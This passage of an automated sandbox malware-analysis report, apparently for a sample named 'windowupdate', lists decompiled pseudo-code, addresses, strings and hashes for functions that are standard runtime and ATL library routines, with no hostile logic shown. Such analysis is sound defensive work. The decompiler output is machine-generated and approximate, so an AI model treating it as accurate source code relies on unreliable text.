							 *0xf20640 = _t32 + 1;
							break;
						} else {
							E00D4F350(_a4, 2);
							return _a4;
						}
					}
					E00D4FDE0( &_v20, 0x7d);
					E00D4F240(_a4,  &_v20);
					return _a4;
				}
				E00D4F350(_a4, 1);
				return _a4;
			}

















                      0x00d52860
                      0x00d52860
                      0x00d52860
                      0x00d52866
                      0x00d52870
                      0x00d52888
                      0x00d5288d
                      0x00d52890
                      0x00d5289c
                      0x00d528a1
                      0x00d528a5
                      0x00d528b4
                      0x00d528bb
                      0x00d528bb
                      0x00d528c4
                      0x00d528c9
                      0x00d528d0
                      0x00d528d5
                      0x00d528e1
                      0x00d528f2
                      0x00d528fa
                      0x00d528ff
                      0x00d5290b
                      0x00d5291c
                      0x00000000
                      0x00d5291c
                      0x00d5290d
                      0x00d52915
                      0x00000000
                      0x00d528e3
                      0x00d528e8
                      0x00000000
                      0x00d528ed
                      0x00d528e1
                      0x00d52927
                      0x00d52933
                      0x00000000
                      0x00d52938
                      0x00d52877
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D52877
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+.LIBCMTD ref: 00D5289C
                      • DName::operator+=.LIBCMTD ref: 00D528BB
                      • DName::DName.LIBVCRUNTIMED ref: 00D528E8
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Name::operator+Name::operator+=Node::makeStatus
                      • String ID:
                      • API String ID: 2485589204-0
                      • Opcode ID: 11bab6faa2c96c6e9f0352213584639cd7feaef8002e6c41390f81b8c09b1672
                      • Instruction ID: c680ec47d77939dbc28d2ba7518c5566c3ed3b382c04ff833238bcb8889887c8
                      • Opcode Fuzzy Hash: 11bab6faa2c96c6e9f0352213584639cd7feaef8002e6c41390f81b8c09b1672
                      • Instruction Fuzzy Hash: F721D371A041189BEF14DF50D891BBE3B70FF82305F084068EC465B2A2DB31AA49DFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D59B40 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D59B40(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char* _t18;
				char* _t39;
				intOrPtr _t42;
				char* _t52;

				_t18 =  *0xf20640; // 0x0
				if( *_t18 != 0) {
					_v8 = E00D58D00(__ebx, __edi, __esi,  &_v24);
					E00D4FBB0(_v8,  &_v16, 0x7b);
					_t39 =  *0xf20640; // 0x0
					if( *_t39 != 0x40) {
						E00D4FD40( &_v16, E00D5A1E0(__ebx, __edi, __esi,  &_v32, 0, 0));
						E00D4FDE0( &_v16, 0x3a);
						E00D4FD40( &_v16, E00D586C0(__ebx, __edi, __esi,  &_v40));
					}
					E00D4FDE0( &_v16, 0x7d);
					_t52 =  *0xf20640; // 0x0
					if( *_t52 != 0x40) {
						E00D4F350(_a4, 2);
						return _a4;
					} else {
						_t42 =  *0xf20640; // 0x0
						 *0xf20640 = _t42 + 1;
						E00D4F240(_a4,  &_v16);
						return _a4;
					}
				}
				E00D4F350(_a4, 1);
				return _a4;
			}












                      0x00d59b46
                      0x00d59b50
                      0x00d59b70
                      0x00d59b7c
                      0x00d59b81
                      0x00d59b8d
                      0x00d59ba3
                      0x00d59bad
                      0x00d59bc2
                      0x00d59bc2
                      0x00d59bcc
                      0x00d59bd1
                      0x00d59bdd
                      0x00d59c04
                      0x00000000
                      0x00d59bdf
                      0x00d59bdf
                      0x00d59be8
                      0x00d59bf5
                      0x00000000
                      0x00d59bfa
                      0x00d59bdd
                      0x00d59b57
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D59B57
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+.LIBCMTD ref: 00D59B7C
                      • DName::operator+=.LIBCMTD ref: 00D59BAD
                      • DName::operator+=.LIBCMTD ref: 00D59BCC
                      • Mailbox.LIBCMTD ref: 00D59BF5
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: NameName::operator+=$MailboxName::Name::operator+Node::makeStatus
                      • String ID:
                      • API String ID: 3234464337-0
                      • Opcode ID: 8b0350f7138cae17da442a45a800c9423af66cb24535ab25f91f7e1412f32f42
                      • Instruction ID: 23fcebd27ef0eccb343330f81a8f53c272fab4cd51a7aaf8282b98b8370237e0
                      • Opcode Fuzzy Hash: 8b0350f7138cae17da442a45a800c9423af66cb24535ab25f91f7e1412f32f42
                      • Instruction Fuzzy Hash: 26214271D00108ABDB14EF50D892EAE7B75EB40345F144169FD166B1A2DF71BE05CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DA5490 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 203COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00DA5490(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t108;
				intOrPtr _t124;
				void* _t141;
				signed int _t181;
				void* _t199;
				void* _t200;

				_t101 = _a4;
				if( *((intOrPtr*)(_a4 + 0x88)) == 0 ||  *((intOrPtr*)(_a4 + 0x88)) == 0xdf6770 ||  *((intOrPtr*)(_a4 + 0x7c)) == 0) {
					L11:
					if( *((intOrPtr*)(_a4 + 0x8c)) != 0) {
						_t32 = _a4 + 0x8c; // 0x4d8bffff
						_t218 =  *((intOrPtr*)( *_t32));
						if( *((intOrPtr*)( *_t32)) == 0) {
							_t34 = _a4 + 0x90; // 0x84e851fc
							L00D89480(_t218,  *_t34 - 0xfe, 2);
							_t36 = _a4 + 0x94; // 0x8bfffffb
							L00D89480(_t218,  *_t36 - 0x80, 2);
							_t38 = _a4 + 0x98; // 0x8bc35de5
							L00D89480( *_t38 - 0x80,  *_t38 - 0x80, 2);
							_t40 = _a4 + 0x8c; // 0x4d8bffff
							_t101 = L00D89480( *_t38 - 0x80,  *_t40, 2);
							_t199 = _t199 + 0x20;
						}
					}
					_t42 = _a4 + 0x9c; // 0xec8b55ff
					E00DA5790(_t101,  *_t42);
					_t200 = _t199 + 4;
					_v8 = 0;
					while(_v8 <= 5) {
						if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x20)) != 0xdf61e8 &&  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x28)) != 0) {
							_t58 = (_v8 << 4) + 0x28; // 0x8bcccccc
							if( *((intOrPtr*)( *((intOrPtr*)(_a4 + _t58)))) == 0) {
								_t62 = (_v8 << 4) + 0x28; // 0x8bcccccc
								L00D89480(_v8 << 4,  *((intOrPtr*)(_a4 + _t62)), 2);
								_t66 = _v8 * 4; // 0xfe45e851
								L00D89480(_v8 << 4,  *((intOrPtr*)(_a4 + _t66 + 0xa0)), 2);
								_t200 = _t200 + 0x10;
							}
						}
						if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) == 0 ||  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)) == 0) {
							if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) != 0) {
								L25:
								_t108 = L00D84930(_t228, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\locale\\locale_refcounting.cpp", 0xaf, 0, L"%ls", L"(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[category].locale == nullptr && ptloci->lc_category[category].refcount == nullptr)");
								_t200 = _t200 + 0x18;
								if(_t108 == 1) {
									asm("int3");
								}
								goto L27;
							}
							_t181 = _v8 << 4;
							_t124 = _a4;
							_t228 =  *((intOrPtr*)(_t124 + _t181 + 0x24));
							if( *((intOrPtr*)(_t124 + _t181 + 0x24)) == 0) {
								goto L27;
							}
							goto L25;
						} else {
							L27:
							if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) != 0 &&  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)) != 0 &&  *((intOrPtr*)( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)))) == 0) {
								L00D89480(_v8 << 4,  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)), 2);
								_t200 = _t200 + 8;
							}
							_v8 = _v8 + 1;
							continue;
						}
					}
					return L00D89480(__eflags, _a4, 2);
				} else {
					_t8 = _a4 + 0x7c; // 0xeb027500
					if( *((intOrPtr*)( *_t8)) != 0) {
						goto L11;
					}
					if( *((intOrPtr*)(_a4 + 0x84)) != 0) {
						_t12 = _a4 + 0x84; // 0xdf6074
						_t214 =  *((intOrPtr*)( *_t12));
						if( *((intOrPtr*)( *_t12)) == 0) {
							_t14 = _a4 + 0x84; // 0xdf6074
							_t141 = L00D89480(_t214,  *_t14, 2);
							_t16 = _a4 + 0x88; // 0xce1de850
							E00DA34B0(_t141,  *_t16);
							_t199 = _t199 + 0xc;
						}
					}
					if( *((intOrPtr*)(_a4 + 0x80)) != 0) {
						_t20 = _a4 + 0x80; // 0xa1006a16
						_t216 =  *((intOrPtr*)( *_t20));
						if( *((intOrPtr*)( *_t20)) == 0) {
							_t22 = _a4 + 0x80; // 0xa1006a16
							L00D89480(_t216,  *_t22, 2);
							_t24 = _a4 + 0x88; // 0xce1de850
							E00DA3D00( *_t24,  *_t24);
							_t199 = _t199 + 0xc;
						}
					}
					_t26 = _a4 + 0x7c; // 0xeb027500
					L00D89480(_t216,  *_t26, 2);
					_t28 = _a4 + 0x88; // 0xce1de850
					_t101 = L00D89480(_t216,  *_t28, 2);
					_t199 = _t199 + 0x10;
					goto L11;
				}
			}










                      0x00da5496
                      0x00da54a0
                      0x00da557a
                      0x00da5584
                      0x00da5589
                      0x00da558f
                      0x00da5592
                      0x00da5599
                      0x00da55a5
                      0x00da55b2
                      0x00da55bf
                      0x00da55cc
                      0x00da55d9
                      0x00da55e6
                      0x00da55ed
                      0x00da55f2
                      0x00da55f2
                      0x00da5592
                      0x00da55f8
                      0x00da55ff
                      0x00da5604
                      0x00da5607
                      0x00da5619
                      0x00da5634
                      0x00da564f
                      0x00da5656
                      0x00da5663
                      0x00da5668
                      0x00da5678
                      0x00da5680
                      0x00da5685
                      0x00da5685
                      0x00da5656
                      0x00da5696
                      0x00da56b6
                      0x00da56c8
                      0x00da56e0
                      0x00da56e5
                      0x00da56eb
                      0x00da56ed
                      0x00da56ed
                      0x00000000
                      0x00da56eb
                      0x00da56bb
                      0x00da56be
                      0x00da56c1
                      0x00da56c6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00da56ee
                      0x00da56ee
                      0x00da56fc
                      0x00da5730
                      0x00da5735
                      0x00da5735
                      0x00da5616
                      0x00000000
                      0x00da5616
                      0x00da5696
                      0x00da574e
                      0x00da54c6
                      0x00da54c9
                      0x00da54cf
                      0x00000000
                      0x00000000
                      0x00da54df
                      0x00da54e4
                      0x00da54ea
                      0x00da54ed
                      0x00da54f4
                      0x00da54fb
                      0x00da5506
                      0x00da550d
                      0x00da5512
                      0x00da5512
                      0x00da54ed
                      0x00da551f
                      0x00da5524
                      0x00da552a
                      0x00da552d
                      0x00da5534
                      0x00da553b
                      0x00da5546
                      0x00da554d
                      0x00da5552
                      0x00da5552
                      0x00da552d
                      0x00da555a
                      0x00da555e
                      0x00da556b
                      0x00da5572
                      0x00da5577
                      0x00000000
                      0x00da5577

                      APIs
                      Strings
                      • (ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 00DA56C8
                      • minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 00DA56D9
                      • %ls, xrefs: 00DA56CD
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___free_lconv_mon___free_lconv_num
                      • String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
                      • API String ID: 717313246-164516335
                      • Opcode ID: f0f704818f846fcb395340c1ec19318d18939553625b108d255e3dc4dda8572b
                      • Instruction ID: 3441cd6faf74a9beb369dec1772e737e17abc56d3694753f4109e39f3fcdafef
                      • Opcode Fuzzy Hash: f0f704818f846fcb395340c1ec19318d18939553625b108d255e3dc4dda8572b
                      • Instruction Fuzzy Hash: F6816174A00204EFEB14DF18D495FA97762FB45358F588168F8495F386CB71EE86CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D46190 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158COMMON
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E00D46190(void* __edi, void* __esi, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int* _v8;
				char _v48;
				signed int _v56;
				signed int _v64;
				signed int _v72;
				signed int _v76;
				void _v80;
				void* _t96;
				void* _t110;
				signed int* _t121;
				signed int _t132;
				signed int _t146;
				void* _t159;
				void* _t160;
				void* _t161;

				memset( &_v80, 0xcccccccc, 0x13 << 2);
				_t161 = _t160 + 0xc;
				_v8 = _a4;
				E00D44D70( &_v48, _v8[1], _a8, _a12, _a16, 1);
				_v56 = _v8[6];
				_v8[6] =  &_v48;
				_v64 = 0;
				_t157 = _t161;
				_v72 = E00DC1520( *((intOrPtr*)( *( *_v8)))(_v8[1], _a8, _a12, _a16,  &_v64, 0), _t161 - _t161);
				_t121 = _v8;
				_t164 =  *((intOrPtr*)(_t121 + 0x18)) -  &_v48;
				if( *((intOrPtr*)(_t121 + 0x18)) !=  &_v48) {
					_t110 = L00D84930(_t164, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf55, 0, L"%ls", L"pThis->m_pCurrentMsg == &msg");
					_t161 = _t161 + 0x18;
					if(_t110 == 1) {
						asm("int3");
					}
				}
				_t146 = _v56;
				_v8[6] = _t146;
				if(_v72 == 0) {
					__eflags = _a8 - 0x82;
					if(__eflags == 0) {
						_t132 = _v8[7] | 0x00000001;
						__eflags = _t132;
						_t146 = _v8;
						 *(_t146 + 0x1c) = _t132;
					}
					L16:
					if((_v8[7] & 0x00000001) != 0) {
						_t146 = _v8;
						if( *((intOrPtr*)(_t146 + 0x18)) == 0) {
							_v76 = _v8[1];
							_v8[1] = 0;
							_v8[7] = _v8[7] & 0xfffffffe;
							_t146 =  *_v8;
							E00DC1520( *((intOrPtr*)( *((intOrPtr*)(_t146 + 0xc))))(_v76), _t161 - _t161);
						}
					}
					_push(_t146);
					_push(_v72);
					E00DC14C0(_t159, 0xd46368);
					_pop(_t96);
					return E00DC1520(_t96, _t159 - _t161 + 0x4c);
				}
				_v80 = _a8;
				if(_v80 > 0x132) {
					_v80 = _v80 - 0x133;
					if(_v80 > 5) {
						L11:
						_t146 = _v8[7] & 0x00000001;
						__eflags = _t146;
						if(__eflags == 0) {
							_t146 =  *(_v8 + 4);
							E00D3C3E0(_t157, _t146, 0, _v64);
							_t161 = _t161 + 0xc;
						}
						L13:
						goto L16;
					}
					_t146 = _v80;
					goto  *((intOrPtr*)(_t146 * 4 +  &M00D46480))[L10]goto ( *((intOrPtr*)(_t146 * 4 +  &M00D46480)));
					L10:
					_v72 = _v64;
					goto L13;
				}
				if(_v80 == 0x132) {
					goto L10;
				}
				_v80 = _v80 - 0x2e;
				if(_v80 > 0xe2) {
					goto L11;
				}
				_t42 = _v80 + 0xd4639c; // 0x62af9000
				switch( *((intOrPtr*)(( *_t42 & 0x000000ff) * 4 +  &M00D46394))) {
					case 0:
						goto L10;
					case 1:
						goto L11;
				}
			}


















                      0x00d461a5
                      0x00d461a5
                      0x00d461aa
                      0x00d461c5
                      0x00d461d0
                      0x00d461d9
                      0x00d461dc
                      0x00d461e3
                      0x00d46211
                      0x00d46214
                      0x00d4621a
                      0x00d4621d
                      0x00d46237
                      0x00d4623c
                      0x00d46242
                      0x00d46244
                      0x00d46244
                      0x00d46242
                      0x00d46248
                      0x00d4624b
                      0x00d46252
                      0x00d462d9
                      0x00d462e0
                      0x00d462e8
                      0x00d462e8
                      0x00d462eb
                      0x00d462ee
                      0x00d462ee
                      0x00d462f1
                      0x00d462fa
                      0x00d462fc
                      0x00d46303
                      0x00d4630b
                      0x00d46311
                      0x00d46324
                      0x00d46330
                      0x00d4633c
                      0x00d4633c
                      0x00d46303
                      0x00d46344
                      0x00d46347
                      0x00d4634e
                      0x00d46353
                      0x00d46364
                      0x00d46364
                      0x00d4625b
                      0x00d46265
                      0x00d4629c
                      0x00d462a3
                      0x00d462b7
                      0x00d462bd
                      0x00d462bd
                      0x00d462c0
                      0x00d462cb
                      0x00d462cf
                      0x00d462d4
                      0x00d462d4
                      0x00d462d7
                      0x00000000
                      0x00d462d7
                      0x00d462a5
                      0x00d462a8
                      0x00d462af
                      0x00d462b2
                      0x00000000
                      0x00d462b2
                      0x00d4626e
                      0x00000000
                      0x00000000
                      0x00d46276
                      0x00d46280
                      0x00000000
                      0x00000000
                      0x00d46285
                      0x00d4628c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D4634E
                      Strings
                      • %ls, xrefs: 00D46224
                      • pThis->m_pCurrentMsg == &msg, xrefs: 00D4621F
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D46230
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$pThis->m_pCurrentMsg == &msg
                      • API String ID: 930174750-2182017553
                      • Opcode ID: d27a7ba5a033313097b476cc9fef990c29e279f58da78c1d9293e90c28374798
                      • Instruction ID: 78bcc9ceacf965da86c9217f905d88e2d5b110eb15b732986c3bcead4f348491
                      • Opcode Fuzzy Hash: d27a7ba5a033313097b476cc9fef990c29e279f58da78c1d9293e90c28374798
                      • Instruction Fuzzy Hash: F0611475E00108EFCB18DF98D590AADB7B1FB89304F248159E916AB385C770EE42DFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D370C0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON
                      Download Yara Rule
                      C-Code - Quality: 76%
                      			E00D370C0(void* __ecx, char* __edx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v24;
				char _v36;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v56;
				intOrPtr _t48;
				intOrPtr _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t58;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t66;
				intOrPtr _t70;
				intOrPtr _t81;
				char* _t82;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_push(__ecx);
				memset( &_v56, 0xcccccccc, 0xd << 2);
				_t93 = _t92 + 0xc;
				_pop(_t70);
				_v8 = _t70;
				do {
					if(_a8 < 0) {
						_v52 = 0;
					} else {
						_v52 = 1;
					}
					_v12 = _v52;
					_t96 = _v12;
					if(_v12 == 0) {
						_t66 = L00D84930(_t96, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x70, 0, "%ls", L"__atl_condVal");
						_t93 = _t93 + 0x18;
						if(_t66 == 1) {
							asm("int3");
						}
					}
					if(_v12 != 0) {
						goto L9;
					}
					_t54 = 0;
					L31:
					_push(_t82);
					E00DC14C0(_t91, 0xd37274);
					_t56 = _t54;
					return E00DC1520(_t56, _t91 - _t93 + 0x34);
					L9:
					_t82 = 0;
					__eflags = 0;
				} while (0 != 0);
				__eflags =  *_a4 - _v8;
				if(__eflags != 0) {
					_t65 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x71, 0, "%ls", L"pData->pStringMgr == this");
					_t93 = _t93 + 0x18;
					__eflags = _t65 - 1;
					if(_t65 == 1) {
						asm("int3");
					}
				}
				_t48 = E00D41ED0( &_a8,  &_a8, _a8, 1);
				_t93 = _t93 + 0xc;
				__eflags = _t48;
				if(_t48 >= 0) {
					_t82 = _a8;
					_v44 = E00D41F10(_t82, 8);
					while(1) {
						__eflags = _a8 - _v44;
						if(_a8 > _v44) {
							_v56 = 0;
						} else {
							_v56 = 1;
						}
						_v48 = _v56;
						__eflags = _v48;
						if(__eflags == 0) {
							_t64 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x7d, 0, "%ls", L"__atl_condVal");
							_t93 = _t93 + 0x18;
							__eflags = _t64 - 1;
							if(_t64 == 1) {
								asm("int3");
							}
						}
						__eflags = _v48;
						if(_v48 == 0) {
							break;
						}
						__eflags = 0;
						if(0 != 0) {
							continue;
						}
						_t82 = _v44;
						_t53 = E00D31860(_a12,  &_v36, _t82, _a12);
						_t93 = _t93 + 0xc;
						__eflags = _t53;
						if(_t53 < 0) {
							L27:
							_t54 = 0;
							goto L31;
						}
						_t82 =  &_v24;
						_t58 = E00D416D0(_t53, _v36, _t82, 0x10, _v36);
						_t93 = _t93 + 0xc;
						__eflags = _t58;
						if(_t58 >= 0) {
							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 4))));
							_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t82 + 8))))(_a4, _v24);
							__eflags = _t93 - _t93;
							_v16 = E00DC1520(_t62, _t93 - _t93);
							__eflags = _v16;
							if(_v16 != 0) {
								_t81 = _v44 - 1;
								__eflags = _t81;
								_t82 = _v16;
								 *((intOrPtr*)(_t82 + 8)) = _t81;
								_t54 = _v16;
							} else {
								_t54 = 0;
							}
							goto L31;
						}
						goto L27;
					}
					_t54 = 0;
				} else {
					_t54 = 0;
				}
			}



























                      0x00d370c0
                      0x00d370c8
                      0x00d370d6
                      0x00d370d6
                      0x00d370d8
                      0x00d370d9
                      0x00d370dc
                      0x00d370e0
                      0x00d370eb
                      0x00d370e2
                      0x00d370e2
                      0x00d370e2
                      0x00d370f5
                      0x00d370f8
                      0x00d370fc
                      0x00d37113
                      0x00d37118
                      0x00d3711e
                      0x00d37120
                      0x00d37120
                      0x00d3711e
                      0x00d37125
                      0x00000000
                      0x00000000
                      0x00d37127
                      0x00d37251
                      0x00d37251
                      0x00d3725b
                      0x00d37260
                      0x00d37271
                      0x00d3712e
                      0x00d3712e
                      0x00d3712e
                      0x00d3712e
                      0x00d37137
                      0x00d3713a
                      0x00d37151
                      0x00d37156
                      0x00d37159
                      0x00d3715c
                      0x00d3715e
                      0x00d3715e
                      0x00d3715c
                      0x00d37169
                      0x00d3716e
                      0x00d37171
                      0x00d37173
                      0x00d3717e
                      0x00d37187
                      0x00d3718a
                      0x00d3718d
                      0x00d37190
                      0x00d3719b
                      0x00d37192
                      0x00d37192
                      0x00d37192
                      0x00d371a5
                      0x00d371a8
                      0x00d371ac
                      0x00d371c3
                      0x00d371c8
                      0x00d371cb
                      0x00d371ce
                      0x00d371d0
                      0x00d371d0
                      0x00d371ce
                      0x00d371d1
                      0x00d371d5
                      0x00000000
                      0x00000000
                      0x00d371db
                      0x00d371dd
                      0x00000000
                      0x00000000
                      0x00d371e3
                      0x00d371eb
                      0x00d371f0
                      0x00d371f3
                      0x00d371f5
                      0x00d3720d
                      0x00d3720d
                      0x00000000
                      0x00d3720d
                      0x00d371fd
                      0x00d37201
                      0x00d37206
                      0x00d37209
                      0x00d3720b
                      0x00d37224
                      0x00d3722c
                      0x00d3722e
                      0x00d37235
                      0x00d37238
                      0x00d3723c
                      0x00d37245
                      0x00d37245
                      0x00d37248
                      0x00d3724b
                      0x00d3724e
                      0x00d3723e
                      0x00d3723e
                      0x00d3723e
                      0x00000000
                      0x00d3723c
                      0x00000000
                      0x00d3720b
                      0x00d371d7
                      0x00d37175
                      0x00d37175
                      0x00d37175

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3725B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
